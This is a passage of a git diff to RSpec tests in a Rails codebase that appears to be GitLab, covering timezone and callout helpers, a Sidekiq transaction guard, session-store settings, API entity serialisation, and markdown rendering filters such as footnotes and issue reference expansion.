expect(timezone_data[0]).to eq( + identifier: tz.tzinfo.identifier, + abbr: tz.tzinfo.strftime('%Z') + ) + end + end + context 'with full format' do subject(:timezone_data) { helper.timezone_data(format: :full) } @@ -64,7 +88,7 @@ RSpec.describe TimeZoneHelper, :aggregate_failures do subject(:timezone_data) { helper.timezone_data(format: :unknown) } it 'raises an exception' do - expect { timezone_data }.to raise_error ArgumentError, 'Invalid format :unknown. Valid formats are :short, :full.' + expect { timezone_data }.to raise_error ArgumentError, 'Invalid format :unknown. Valid formats are :short, :abbr, :full.' end end end @@ -101,7 +125,7 @@ RSpec.describe TimeZoneHelper, :aggregate_failures do end end - describe '#local_time_instance' do + describe '#local_timezone_instance' do let_it_be(:timezone) { 'UTC' } before do @@ -110,25 +134,25 @@ RSpec.describe TimeZoneHelper, :aggregate_failures do context 'when timezone is `nil`' do it 'returns the system timezone instance' do - expect(helper.local_time_instance(nil).name).to eq(timezone) + expect(helper.local_timezone_instance(nil).name).to eq(timezone) end end context 'when timezone is blank' do it 'returns the system timezone instance' do - expect(helper.local_time_instance('').name).to eq(timezone) + expect(helper.local_timezone_instance('').name).to eq(timezone) end end context 'when a valid timezone is passed' do it 'returns the local time instance' do - expect(helper.local_time_instance('America/Los_Angeles').name).to eq('America/Los_Angeles') + expect(helper.local_timezone_instance('America/Los_Angeles').name).to eq('America/Los_Angeles') end end context 'when an invalid timezone is passed' do it 'returns the system timezone instance' do - expect(helper.local_time_instance('Foo/Bar').name).to eq(timezone) + expect(helper.local_timezone_instance('Foo/Bar').name).to eq(timezone) end end end diff --git a/spec/helpers/user_callouts_helper_spec.rb b/spec/helpers/users/callouts_helper_spec.rb index 7abc67e29a4..85e11c2ed3b 100644 --- a/spec/helpers/user_callouts_helper_spec.rb +++ b/spec/helpers/users/callouts_helper_spec.rb @@ -2,7 +2,7 @@ require "spec_helper" -RSpec.describe UserCalloutsHelper do +RSpec.describe Users::CalloutsHelper do let_it_be(:user, refind: true) { create(:user) } before do @@ -61,36 +61,6 @@ RSpec.describe UserCalloutsHelper do end end - describe '.show_customize_homepage_banner?' do - subject { helper.show_customize_homepage_banner? } - - context 'when user has not dismissed' do - before do - allow(helper).to receive(:user_dismissed?).with(described_class::CUSTOMIZE_HOMEPAGE) { false } - end - - context 'when user is on the default dashboard' do - it { is_expected.to be true } - end - - context 'when user is not on the default dashboard' do - before do - user.dashboard = 'stars' - end - - it { is_expected.to be false } - end - end - - context 'when user dismissed' do - before do - allow(helper).to receive(:user_dismissed?).with(described_class::CUSTOMIZE_HOMEPAGE) { true } - end - - it { is_expected.to be false } - end - end - describe '.render_flash_user_callout' do it 'renders the flash_user_callout partial' do expect(helper).to receive(:render) @@ -115,7 +85,7 @@ RSpec.describe UserCalloutsHelper do context 'when the feature flags new version has been dismissed' do before do - create(:user_callout, user: user, feature_name: described_class::FEATURE_FLAGS_NEW_VERSION) + create(:callout, user: user, feature_name: described_class::FEATURE_FLAGS_NEW_VERSION) end it { is_expected.to be_falsy } @@ -203,83 +173,6 @@ RSpec.describe UserCalloutsHelper do end end - describe '.show_invite_banner?' do - let_it_be(:group) { create(:group) } - - subject { helper.show_invite_banner?(group) } - - context 'when user has the admin ability for the group' do - before do - group.add_owner(user) - end - - context 'when the invite_members_banner has not been dismissed' do - it { is_expected.to eq(true) } - - context 'when the group was just created' do - before do - flash[:notice] = "Group #{group.name} was successfully created" - end - - it { is_expected.to eq(false) } - end - - context 'with concerning multiple members' do - let_it_be(:user_2) { create(:user) } - - context 'on current group' do - before do - group.add_guest(user_2) - end - - it { is_expected.to eq(false) } - end - - context 'on current group that is a subgroup' do - let_it_be(:subgroup) { create(:group, parent: group) } - - subject { helper.show_invite_banner?(subgroup) } - - context 'with only one user on parent and this group' do - it { is_expected.to eq(true) } - end - - context 'when another user is on this group' do - before do - subgroup.add_guest(user_2) - end - - it { is_expected.to eq(false) } - end - - context 'when another user is on the parent group' do - before do - group.add_guest(user_2) - end - - it { is_expected.to eq(false) } - end - end - end - end - - context 'when the invite_members_banner has been dismissed' do - before do - create(:group_callout, - user: user, - group: group, - feature_name: described_class::INVITE_MEMBERS_BANNER) - end - - it { is_expected.to eq(false) } - end - end - - context 'when user does not have admin ability for the group' do - it { is_expected.to eq(false) } - end - end - describe '.show_security_newsletter_user_callout?' do let_it_be(:admin) { create(:user, :admin) } diff --git a/spec/helpers/users/group_callouts_helper_spec.rb b/spec/helpers/users/group_callouts_helper_spec.rb new file mode 100644 index 00000000000..da67c4921b3 --- /dev/null +++ b/spec/helpers/users/group_callouts_helper_spec.rb @@ -0,0 +1,87 @@ +# frozen_string_literal: true + +require "spec_helper" + +RSpec.describe Users::GroupCalloutsHelper do + let_it_be(:user, refind: true) { create(:user) } + let_it_be(:group) { create(:group) } + + before do + allow(helper).to receive(:current_user).and_return(user) + end + + describe '.show_invite_banner?' do + subject { helper.show_invite_banner?(group) } + + context 'when user has the admin ability for the group' do + before do + group.add_owner(user) + end + + context 'when the invite_members_banner has not been dismissed' do + it { is_expected.to eq(true) } + + context 'when the group was just created' do + before do + flash[:notice] = "Group #{group.name} was successfully created" + end + + it { is_expected.to eq(false) } + end + + context 'with concerning multiple members' do + let_it_be(:user_2) { create(:user) } + + context 'on current group' do + before do + group.add_guest(user_2) + end + + it { is_expected.to eq(false) } + end + + context 'on current group that is a subgroup' do + let_it_be(:subgroup) { create(:group, parent: group) } + + subject { helper.show_invite_banner?(subgroup) } + + context 'with only one user on parent and this group' do + it { is_expected.to eq(true) } + end + + context 'when another user is on this group' do + before do + subgroup.add_guest(user_2) + end + + it { is_expected.to eq(false) } + end + + context 'when another user is on the parent group' do + before do + group.add_guest(user_2) + end + + it { is_expected.to eq(false) } + end + end + end + end + + context 'when the invite_members_banner has been dismissed' do + before do + create(:group_callout, + user: user, + group: group, + feature_name: described_class::INVITE_MEMBERS_BANNER) + end + + it { is_expected.to eq(false) } + end + end + + context 'when user does not have admin ability for the group' do + it { is_expected.to eq(false) } + end + end +end diff --git a/spec/helpers/version_check_helper_spec.rb b/spec/helpers/version_check_helper_spec.rb index 6d849d0720e..bd52eda8a65 100644 --- a/spec/helpers/version_check_helper_spec.rb +++ b/spec/helpers/version_check_helper_spec.rb @@ -15,7 +15,7 @@ RSpec.describe VersionCheckHelper do before do stub_rails_env('production') allow(Gitlab::CurrentSettings.current_application_settings).to receive(:version_check_enabled) { true } - allow(VersionCheck).to receive(:url) { 'https://version.host.com/check.svg?gitlab_info=xxx' } + allow(VersionCheck).to receive(:image_url) { 'https://version.host.com/check.svg?gitlab_info=xxx' } end it 'returns an image tag' do @@ -27,7 +27,7 @@ RSpec.describe VersionCheckHelper do .to match(/class="js-version-status-badge lazy"/) end - it 'has a VersionCheck url as the src' do + it 'has a VersionCheck image_url as the src' do expect(helper.version_status_badge) .to include(%{src="https://version.host.com/check.svg?gitlab_info=xxx"}) end diff --git a/spec/initializers/forbid_sidekiq_in_transactions_spec.rb b/spec/initializers/forbid_sidekiq_in_transactions_spec.rb new file mode 100644 index 00000000000..6cd15d37ad4 --- /dev/null +++ b/spec/initializers/forbid_sidekiq_in_transactions_spec.rb @@ -0,0 +1,38 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe 'Sidekiq::Worker' do + let(:worker_class) do + Class.new do + include Sidekiq::Worker + + def perform + end + end + end + + it 'allows sidekiq worker outside of a transaction' do + expect { worker_class.perform_async }.not_to raise_error + end + + it 'forbids queue sidekiq worker in a transaction' do + Project.transaction do + expect { worker_class.perform_async }.to raise_error(Sidekiq::Worker::EnqueueFromTransactionError) + end + end + + it 'allows sidekiq worker in a transaction if skipped' do + Sidekiq::Worker.skipping_transaction_check do + Project.transaction do + expect { worker_class.perform_async }.not_to raise_error + end + end + end + + it 'forbids queue sidekiq worker in a Ci::ApplicationRecord transaction' do + Ci::Pipeline.transaction do + expect { worker_class.perform_async }.to raise_error(Sidekiq::Worker::EnqueueFromTransactionError) + end + end +end diff --git a/spec/initializers/lograge_spec.rb b/spec/initializers/lograge_spec.rb index 9e58fa289ac..0a794e8ebcd 100644 --- a/spec/initializers/lograge_spec.rb +++ b/spec/initializers/lograge_spec.rb @@ -157,6 +157,16 @@ RSpec.describe 'lograge', type: :request do expect(log_data['exception.message']).to eq('bad request') expect(log_data['exception.backtrace']).to eq(Gitlab::BacktraceCleaner.clean_backtrace(backtrace)) end + + context 'with an ActiveRecord::StatementInvalid' do + let(:exception) { ActiveRecord::StatementInvalid.new(sql: 'SELECT "users".* FROM "users" WHERE "users"."id" = 1 AND "users"."foo" = $1') } + + it 'adds the SQL query to the log' do + subscriber.process_action(event) + + expect(log_data['exception.sql']).to eq('SELECT "users".* FROM "users" WHERE "users"."id" = $2 AND "users"."foo" = $1') + end + end end describe 'with etag_route' do diff --git a/spec/initializers/session_store_spec.rb b/spec/initializers/session_store_spec.rb index 3da52ccc981..db90b335dc9 100644 --- a/spec/initializers/session_store_spec.rb +++ b/spec/initializers/session_store_spec.rb @@ -10,25 +10,37 @@ RSpec.describe 'Session initializer for GitLab' do end describe 'config#session_store' do - context 'when the GITLAB_REDIS_STORE_WITH_SESSION_STORE env is not set' do + context 'when the GITLAB_USE_REDIS_SESSIONS_STORE env is not set' do before do - stub_env('GITLAB_REDIS_STORE_WITH_SESSION_STORE', nil) + stub_env('GITLAB_USE_REDIS_SESSIONS_STORE', nil) end - it 'initialized as a redis_store with a proper Redis::Store instance' do + it 'initialized with Multistore as ENV var defaults to true' do expect(subject).to receive(:session_store).with(:redis_store, a_hash_including(redis_store: kind_of(::Redis::Store))) load_session_store end end - context 'when the GITLAB_REDIS_STORE_WITH_SESSION_STORE env is disabled' do + context 'when the GITLAB_USE_REDIS_SESSIONS_STORE env is disabled' do before do - stub_env('GITLAB_REDIS_STORE_WITH_SESSION_STORE', false) + stub_env('GITLAB_USE_REDIS_SESSIONS_STORE', false) end it 'initialized as a redis_store with a proper servers configuration' do - expect(subject).to receive(:session_store).with(:redis_store, a_hash_including(servers: kind_of(Hash))) + expect(subject).to receive(:session_store).with(:redis_store, a_hash_including(redis_store: kind_of(Redis::Store))) + + load_session_store + end + end + + context 'when the GITLAB_USE_REDIS_SESSIONS_STORE env is enabled' do + before do + stub_env('GITLAB_USE_REDIS_SESSIONS_STORE', true) + end + + it 'initialized as a redis_store with a proper servers configuration' do + expect(subject).to receive(:session_store).with(:redis_store, a_hash_including(redis_store: kind_of(::Redis::Store))) load_session_store end diff --git a/spec/initializers/validate_database_config_spec.rb b/spec/initializers/validate_database_config_spec.rb index 99e4a4b36ee..209d9691350 100644 --- a/spec/initializers/validate_database_config_spec.rb +++ b/spec/initializers/validate_database_config_spec.rb @@ -14,6 +14,9 @@ RSpec.describe 'validate database config' do end before do + allow(File).to receive(:exist?).and_call_original + allow(File).to receive(:exist?).with(Rails.root.join("config/database_geo.yml")).and_return(false) + # The `AS::ConfigurationFile` calls `read` in `def initialize` # thus we cannot use `expect_next_instance_of` # rubocop:disable RSpec/AnyInstanceOf diff --git a/spec/lib/after_commit_queue_spec.rb b/spec/lib/after_commit_queue_spec.rb deleted file mode 100644 index ca383808bfc..00000000000 --- a/spec/lib/after_commit_queue_spec.rb +++ /dev/null @@ -1,17 +0,0 @@ -# frozen_string_literal: true - -require 'spec_helper' - -RSpec.describe AfterCommitQueue do - it 'runs after transaction is committed' do - called = false - test_proc = proc { called = true } - - project = build(:project) - project.run_after_commit(&test_proc) - - project.save - - expect(called).to be true - end -end diff --git a/spec/lib/api/ci/helpers/runner_helpers_spec.rb b/spec/lib/api/ci/helpers/runner_helpers_spec.rb index c6638bea59e..c4d740f0adc 100644 --- a/spec/lib/api/ci/helpers/runner_helpers_spec.rb +++ b/spec/lib/api/ci/helpers/runner_helpers_spec.rb @@ -38,6 +38,7 @@ RSpec.describe API::Ci::Helpers::Runner do let(:revision) { '10.0' } let(:platform) { 'test' } let(:architecture) { 'arm' } + let(:executor) { 'shell' } let(:config) { { 'gpus' => 'all' } } let(:runner_params) do { @@ -48,6 +49,7 @@ RSpec.describe API::Ci::Helpers::Runner do 'revision' => revision, 'platform' => platform, 'architecture' => architecture, + 'executor' => executor, 'config' => config, 'ignored' => 1 } @@ -57,12 +59,13 @@ RSpec.describe API::Ci::Helpers::Runner do subject(:details) { runner_helper.get_runner_details_from_request } it 'extracts the runner details', :aggregate_failures do - expect(details.keys).to match_array(%w(name version revision platform architecture config ip_address)) + expect(details.keys).to match_array(%w(name version revision platform architecture executor config ip_address)) expect(details['name']).to eq(name) expect(details['version']).to eq(version) expect(details['revision']).to eq(revision) expect(details['platform']).to eq(platform) expect(details['architecture']).to eq(architecture) + expect(details['executor']).to eq(executor) expect(details['config']).to eq(config) expect(details['ip_address']).to eq(ip_address) end diff --git a/spec/lib/api/entities/changelog_spec.rb b/spec/lib/api/entities/changelog_spec.rb new file mode 100644 index 00000000000..2cf585d4e0e --- /dev/null +++ b/spec/lib/api/entities/changelog_spec.rb @@ -0,0 +1,17 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe API::Entities::Changelog do + let(:changelog) { "This is a changelog" } + + subject { described_class.new(changelog).as_json } + + it 'exposes correct attributes' do + expect(subject).to include(:notes) + end + + it 'exposes correct notes' do + expect(subject[:notes]).to eq(changelog) + end +end diff --git a/spec/lib/api/entities/ci/pipeline_spec.rb b/spec/lib/api/entities/ci/pipeline_spec.rb new file mode 100644 index 00000000000..6a658cc3e18 --- /dev/null +++ b/spec/lib/api/entities/ci/pipeline_spec.rb @@ -0,0 +1,16 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe API::Entities::Ci::Pipeline do + let_it_be(:pipeline) { create(:ci_empty_pipeline) } + let_it_be(:job) { create(:ci_build, name: "rspec", coverage: 30.212, pipeline: pipeline) } + + let(:entity) { described_class.new(pipeline) } + + subject { entity.as_json } + + it 'returns the coverage as a string' do + expect(subject[:coverage]).to eq '30.21' + end +end diff --git a/spec/lib/api/entities/personal_access_token_spec.rb b/spec/lib/api/entities/personal_access_token_spec.rb new file mode 100644 index 00000000000..fd3c53a21b4 --- /dev/null +++ b/spec/lib/api/entities/personal_access_token_spec.rb @@ -0,0 +1,26 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe API::Entities::PersonalAccessToken do + describe '#as_json' do + let_it_be(:user) { create(:user) } + let_it_be(:token) { create(:personal_access_token, user: user, expires_at: nil) } + + let(:entity) { described_class.new(token) } + + it 'returns token data' do + expect(entity.as_json).to eq({ + id: token.id, + name: token.name, + revoked: false, + created_at: token.created_at, + scopes: ['api'], + user_id: user.id, + last_used_at: nil, + active: true, + expires_at: nil + }) + end + end +end diff --git a/spec/lib/api/entities/plan_limit_spec.rb b/spec/lib/api/entities/plan_limit_spec.rb index 75e39e4f074..1b8b21d47f3 100644 --- a/spec/lib/api/entities/plan_limit_spec.rb +++ b/spec/lib/api/entities/plan_limit_spec.rb @@ -11,6 +11,7 @@ RSpec.describe API::Entities::PlanLimit do expect(subject).to include( :conan_max_file_size, :generic_packages_max_file_size, + :helm_max_file_size, :maven_max_file_size, :npm_max_file_size, :nuget_max_file_size, diff --git a/spec/lib/api/entities/project_import_failed_relation_spec.rb b/spec/lib/api/entities/project_import_failed_relation_spec.rb index d3c24f6fce3..d6143915ecb 100644 --- a/spec/lib/api/entities/project_import_failed_relation_spec.rb +++ b/spec/lib/api/entities/project_import_failed_relation_spec.rb @@ -16,7 +16,8 @@ RSpec.describe API::Entities::ProjectImportFailedRelation do exception_class: import_failure.exception_class, exception_message: nil, relation_name: import_failure.relation_key, - source: import_failure.source + source: import_failure.source, + line_number: import_failure.relation_index ) end end diff --git a/spec/lib/api/entities/project_import_status_spec.rb b/spec/lib/api/entities/project_import_status_spec.rb index 5eda613a6a6..37a18718950 100644 --- a/spec/lib/api/entities/project_import_status_spec.rb +++ b/spec/lib/api/entities/project_import_status_spec.rb @@ -2,29 +2,32 @@ require 'spec_helper' -RSpec.describe API::Entities::ProjectImportStatus do +RSpec.describe API::Entities::ProjectImportStatus, :aggregate_failures do describe '#as_json' do subject { entity.as_json } let(:correlation_id) { 'cid' } context 'when no import state exists' do - let(:entity) { described_class.new(build(:project)) } + let(:entity) { described_class.new(build(:project, import_type: 'import_type')) } it 'includes basic fields and no failures' do expect(subject[:import_status]).to eq('none') + expect(subject[:import_type]).to eq('import_type') expect(subject[:correlation_id]).to be_nil expect(subject[:import_error]).to be_nil expect(subject[:failed_relations]).to eq([]) + expect(subject[:stats]).to be_nil end end context 'when import has not finished yet' do - let(:project) { create(:project, :import_scheduled, import_correlation_id: correlation_id) } - let(:entity) { described_class.new(project) } + let(:project) { create(:project, :import_scheduled, import_type: 'import_type', import_correlation_id: correlation_id) } + let(:entity) { described_class.new(project, import_type: 'import_type') } - it 'includes basic fields and no failures', :aggregate_failures do + it 'includes basic fields and no failures' do expect(subject[:import_status]).to eq('scheduled') + expect(subject[:import_type]).to eq('import_type') expect(subject[:correlation_id]).to eq(correlation_id) expect(subject[:import_error]).to be_nil expect(subject[:failed_relations]).to eq([]) @@ -32,29 +35,64 @@ RSpec.describe API::Entities::ProjectImportStatus do end context 'when import has finished with failed relations' do - let(:project) { create(:project, :import_finished, import_correlation_id: correlation_id) } + let(:project) { create(:project, :import_finished, import_type: 'import_type', import_correlation_id: correlation_id) } let(:entity) { described_class.new(project) } - it 'includes basic fields with failed relations', :aggregate_failures do - create(:import_failure, :hard_failure, project: project, correlation_id_value: correlation_id) + it 'includes basic fields with failed relations' do + create( + :import_failure, + :hard_failure, + project: project, + correlation_id_value: correlation_id, + relation_key: 'issues', + relation_index: 1 + ) + + # Doesn't show soft failures + create(:import_failure, :soft_failure) expect(subject[:import_status]).to eq('finished') + expect(subject[:import_type]).to eq('import_type') expect(subject[:correlation_id]).to eq(correlation_id) expect(subject[:import_error]).to be_nil - expect(subject[:failed_relations]).not_to be_empty + expect(subject[:failed_relations].length).to eq(1) + + failure = subject[:failed_relations].last + expect(failure[:exception_class]).to eq('RuntimeError') + expect(failure[:source]).to eq('method_call') + expect(failure[:relation_name]).to eq('issues') + expect(failure[:line_number]).to eq(1) end end context 'when import has failed' do - let(:project) { create(:project, :import_failed, import_correlation_id: correlation_id, import_last_error: 'error') } + let(:project) { create(:project, :import_failed, import_type: 'import_type', import_correlation_id: correlation_id, import_last_error: 'error') } let(:entity) { described_class.new(project) } - it 'includes basic fields with import error', :aggregate_failures do + it 'includes basic fields with import error' do expect(subject[:import_status]).to eq('failed') + expect(subject[:import_type]).to eq('import_type') expect(subject[:correlation_id]).to eq(correlation_id) expect(subject[:import_error]).to eq('error') expect(subject[:failed_relations]).to eq([]) end end + + context 'when importing from github', :clean_gitlab_redis_cache do + let(:project) { create(:project, :import_failed, import_type: 'github') } + let(:entity) { described_class.new(project) } + + before do + ::Gitlab::GithubImport::ObjectCounter.increment(project, :issues, :fetched, value: 10) + ::Gitlab::GithubImport::ObjectCounter.increment(project, :issues, :imported, value: 8) + end + + it 'exposes the import stats' do + expect(subject[:stats]).to eq( + 'fetched' => { 'issues' => 10 }, + 'imported' => { 'issues' => 8 } + ) + end + end end end diff --git a/spec/lib/banzai/filter/external_link_filter_spec.rb b/spec/lib/banzai/filter/external_link_filter_spec.rb index 630730dfc1a..24d13bdb42c 100644 --- a/spec/lib/banzai/filter/external_link_filter_spec.rb +++ b/spec/lib/banzai/filter/external_link_filter_spec.rb @@ -191,4 +191,15 @@ RSpec.describe Banzai::Filter::ExternalLinkFilter do end end end + + context 'for links that have `rel=license`' do + let(:doc) { filter %q(<a rel="license" href="http://example.com">rel-license</a>) } + + it_behaves_like 'an external link with rel attribute' + + it 'maintains rel license' do + expect(doc.at_css('a')).to have_attribute('rel') + expect(doc.at_css('a')['rel']).to include 'license' + end + end end diff --git a/spec/lib/banzai/filter/footnote_filter_spec.rb b/spec/lib/banzai/filter/footnote_filter_spec.rb index 54faa748d53..d41f5e8633d 100644 --- a/spec/lib/banzai/filter/footnote_filter_spec.rb +++ b/spec/lib/banzai/filter/footnote_filter_spec.rb @@ -4,6 +4,7 @@ require 'spec_helper' RSpec.describe Banzai::Filter::FootnoteFilter do include FilterSpecHelper + using RSpec::Parameterized::TableSyntax # rubocop:disable Style/AsciiComments # first[^1] and second[^second] and third[^_😄_] @@ -13,16 +14,16 @@ RSpec.describe Banzai::Filter::FootnoteFilter do # rubocop:enable Style/AsciiComments let(:footnote) do <<~EOF.strip_heredoc - <p>first<sup><a href="#fn-1" id="fnref-1">1</a></sup> and second<sup><a href="#fn-second" id="fnref-second">2</a></sup> and third<sup><a href="#fn-_%F0%9F%98%84_" id="fnref-_%F0%9F%98%84_">3</a></sup></p> - + <p>first<sup><a href="#fn-1" id="fnref-1" data-footnote-ref>1</a></sup> and second<sup><a href="#fn-second" id="fnref-second" data-footnote-ref>2</a></sup> and third<sup><a href="#fn-_%F0%9F%98%84_" id="fnref-_%F0%9F%98%84_" data-footnote-ref>3</a></sup></p> + <section data-footnotes> <ol> <li id="fn-1"> - <p>one <a href="#fnref-1" aria-label="Back to content">↩</a></p> + <p>one <a href="#fnref-1" aria-label="Back to content" data-footnote-backref>↩</a></p> </li> <li id="fn-second"> - <p>two <a href="#fnref-second" aria-label="Back to content">↩</a></p> + <p>two <a href="#fnref-second" aria-label="Back to content" data-footnote-backref>↩</a></p> </li>\n<li id="fn-_%F0%9F%98%84_"> - <p>three <a href="#fnref-_%F0%9F%98%84_" aria-label="Back to content">↩</a></p> + <p>three <a href="#fnref-_%F0%9F%98%84_" aria-label="Back to content" data-footnote-backref>↩</a></p> </li> </ol> EOF @@ -30,19 +31,20 @@ RSpec.describe Banzai::Filter::FootnoteFilter do let(:filtered_footnote) do <<~EOF.strip_heredoc - <p>first<sup class="footnote-ref"><a href="#fn-1-#{identifier}" id="fnref-1-#{identifier}" data-footnote-ref="">1</a></sup> and second<sup class="footnote-ref"><a href="#fn-second-#{identifier}" id="fnref-second-#{identifier}" data-footnote-ref="">2</a></sup> and third<sup class="footnote-ref"><a href="#fn-_%F0%9F%98%84_-#{identifier}" id="fnref-_%F0%9F%98%84_-#{identifier}" data-footnote-ref="">3</a></sup></p> - - <section class=\"footnotes\" data-footnotes><ol> + <p>first<sup class="footnote-ref"><a href="#fn-1-#{identifier}" id="fnref-1-#{identifier}" data-footnote-ref>1</a></sup> and second<sup class="footnote-ref"><a href="#fn-second-#{identifier}" id="fnref-second-#{identifier}" data-footnote-ref>2</a></sup> and third<sup class="footnote-ref"><a href="#fn-_%F0%9F%98%84_-#{identifier}" id="fnref-_%F0%9F%98%84_-#{identifier}" data-footnote-ref>3</a></sup></p> + <section data-footnotes class=\"footnotes\"> + <ol> <li id="fn-1-#{identifier}"> - <p>one <a href="#fnref-1-#{identifier}" aria-label="Back to content" class="footnote-backref" data-footnote-backref="">↩</a></p> + <p>one <a href="#fnref-1-#{identifier}" aria-label="Back to content" data-footnote-backref class="footnote-backref">↩</a></p> </li> <li id="fn-second-#{identifier}"> - <p>two <a href="#fnref-second-#{identifier}" aria-label="Back to content" class="footnote-backref" data-footnote-backref="">↩</a></p> + <p>two <a href="#fnref-second-#{identifier}" aria-label="Back to content" data-footnote-backref class="footnote-backref">↩</a></p> </li> <li id="fn-_%F0%9F%98%84_-#{identifier}"> - <p>three <a href="#fnref-_%F0%9F%98%84_-#{identifier}" aria-label="Back to content" class="footnote-backref" data-footnote-backref="">↩</a></p> + <p>three <a href="#fnref-_%F0%9F%98%84_-#{identifier}" aria-label="Back to content" data-footnote-backref class="footnote-backref">↩</a></p> </li> - </ol></section> + </ol> + </section> EOF end @@ -52,7 +54,7 @@ RSpec.describe Banzai::Filter::FootnoteFilter do let(:identifier) { link_node[:id].delete_prefix('fnref-1-') } it 'properly adds the necessary ids and classes' do - expect(doc.to_html).to eq filtered_footnote + expect(doc.to_html).to eq filtered_footnote.strip end context 'using ruby-based HTML renderer' do @@ -101,4 +103,21 @@ RSpec.describe Banzai::Filter::FootnoteFilter do end end end + + context 'when detecting footnotes' do + where(:valid, :markdown) do + true | "1. one[^1]\n[^1]: AbC" + true | "1. one[^abc]\n[^abc]: AbC" + false | '1. [one](#fnref-abc)' + false | "1. one[^1]\n[^abc]: AbC" + end + + with_them do + it 'detects valid footnotes' do + result = Banzai::Pipeline::FullPipeline.call(markdown, project: nil) + + expect(result[:output].at_css('section.footnotes').present?).to eq(valid) + end + end + end end diff --git a/spec/lib/banzai/filter/issuable_state_filter_spec.rb b/spec/lib/banzai/filter/issuable_reference_expansion_filter_spec.rb index a3851fd7cca..0840ccf19e4 100644 --- a/spec/lib/banzai/filter/issuable_state_filter_spec.rb +++ b/spec/lib/banzai/filter/issuable_reference_expansion_filter_spec.rb @@ -2,28 +2,27 @@ require 'spec_helper' -RSpec.describe Banzai::Filter::IssuableStateFilter do - include ActionView::Helpers::UrlHelper +RSpec.describe Banzai::Filter::IssuableReferenceExpansionFilter do include FilterSpecHelper - let(:user) { create(:user) } - let(:context) { { current_user: user, issuable_state_filter_enabled: true } } - let(:closed_issue) { create_issue(:closed) } - let(:project) { create(:project, :public) } - let(:group) { create(:group) } - let(:other_project) { create(:project, :public) } + let_it_be(:user) { create(:user) } + let_it_be(:project) { create(:project, :public) } + let_it_be(:group) { create(:group) } + let_it_be(:other_project) { create(:project, :public) } + let_it_be(:closed_issue) { create_issue(:closed) } + + let(:context) { { current_user: user, issuable_reference_expansion_enabled: true } } def create_link(text, data) - link_to(text, '', class: 'gfm has-tooltip', data: data) + ActionController::Base.helpers.link_to(text, '', class: 'gfm has-tooltip', data: data) end - def create_issue(state) - create(:issue, state, project: project) + def create_issue(state, attributes = {}) + create(:issue, state, attributes.merge(project: project)) end - def create_merge_request(state) - create(:merge_request, state, - source_project: project, target_project: project) + def create_merge_request(state, attributes = {}) + create(:merge_request, state, attributes.merge(source_project: project, target_project: project)) end it 'ignores non-GFM links' do @@ -139,6 +138,30 @@ RSpec.describe Banzai::Filter::IssuableStateFilter do expect(doc.css('a').last.text).to eq("#{moved_issue.to_reference} (moved)") end + + it 'shows title for references with +' do + issue = create_issue(:opened, title: 'Some issue') + link = create_link(issue.to_reference, issue: issue.id, reference_type: 'issue', reference_format: '+') + doc = filter(link, context) + + expect(doc.css('a').last.text).to eq("#{issue.title} (#{issue.to_reference})") + end + + it 'truncates long title for references with +' do + issue = create_issue(:opened, title: 'Some issue ' * 10) + link = create_link(issue.to_reference, issue: issue.id, reference_type: 'issue', reference_format: '+') + doc = filter(link, context) + + expect(doc.css('a').last.text).to eq("#{issue.title.truncate(50)} (#{issue.to_reference})") + end + + it 'shows both title and state for closed references with +' do + issue = create_issue(:closed, title: 'Some issue') + link = create_link(issue.to_reference, issue: issue.id, reference_type: 'issue', reference_format: '+') + doc = filter(link, context) + + expect(doc.css('a').last.text).to eq("#{issue.title} (#{issue.to_reference} - closed)") + end end context 'for merge request references' do @@ -197,5 +220,20 @@ RSpec.describe Banzai::Filter::IssuableStateFilter do expect(doc.css('a').last.text).to eq("#{merge_request.to_reference} (merged)") end + + it 'shows title for references with +' do + merge_request = create_merge_request(:opened, title: 'Some merge request') + + link = create_link( + merge_request.to_reference, + merge_request: merge_request.id, + reference_type: 'merge_request', + reference_format: '+' + ) + + doc = filter(link, context) + + expect(doc.css('a').last.text).to eq("#{merge_request.title} (#{merge_request.to_reference})") + end end end diff --git a/spec/lib/banzai/filter/markdown_filter_spec.rb b/spec/lib/banzai/filter/markdown_filter_spec.rb index a310de5c015..1c9b894e885 100644 --- a/spec/lib/banzai/filter/markdown_filter_spec.rb +++ b/spec/lib/banzai/filter/markdown_filter_spec.rb @@ -33,7 +33,7 @@ RSpec.describe Banzai::Filter::MarkdownFilter do it 'adds language to lang attribute when specified' do result = filter("```html\nsome code\n```", no_sourcepos: true) - if Feature.enabled?(:use_cmark_renderer) + if Feature.enabled?(:use_cmark_renderer, default_enabled: :yaml) expect(result).to start_with('<pre lang="html"><code>') else expect(result).to start_with('<pre><code lang="html">') @@ -49,7 +49,7 @@ RSpec.describe Banzai::Filter::MarkdownFilter do it 'works with utf8 chars in language' do result = filter("```日\nsome code\n```", no_sourcepos: true) - if Feature.enabled?(:use_cmark_renderer) + if Feature.enabled?(:use_cmark_renderer, default_enabled: :yaml) expect(result).to start_with('<pre lang="日"><code>') else expect(result).to start_with('<pre><code lang="日">') @@ -59,7 +59,7 @@ RSpec.describe Banzai::Filter::MarkdownFilter do it 'works with additional language parameters' do result = filter("```ruby:red gem foo\nsome code\n```", no_sourcepos: true) - if Feature.enabled?(:use_cmark_renderer) + if Feature.enabled?(:use_cmark_renderer, default_enabled: :yaml) expect(result).to start_with('<pre lang="ruby:red" data-meta="gem foo"><code>') else expect(result).to start_with('<pre><code lang="ruby:red gem foo">') @@ -102,7 +102,7 @@ RSpec.describe Banzai::Filter::MarkdownFilter do expect(result).to include('<td>foot <sup') - if Feature.enabled?(:use_cmark_renderer) + if Feature.enabled?(:use_cmark_renderer, default_enabled: :yaml) expect(result).to include('<section class="footnotes" data-footnotes>') else expect(result).to include('<section class="footnotes">') diff --git a/spec/lib/banzai/filter/plantuml_filter_spec.rb b/spec/lib/banzai/filter/plantuml_filter_spec.rb index d1a3b5689a8..e1e02c09fbe 100644 --- a/spec/lib/banzai/filter/plantuml_filter_spec.rb +++ b/spec/lib/banzai/filter/plantuml_filter_spec.rb @@ -9,7 +9,7 @@ RSpec.describe Banzai::Filter::PlantumlFilter do it 'replaces plantuml pre tag with img tag' do stub_application_setting(plantuml_enabled: true, plantuml_url: "http://localhost:8080") - input = if Feature.enabled?(:use_cmark_renderer) + input = if Feature.enabled?(:use_cmark_renderer, default_enabled: :yaml) '<pre lang="plantuml"><code>Bob -> Sara : Hello</code></pre>' else '<pre><code lang="plantuml">Bob -> Sara : 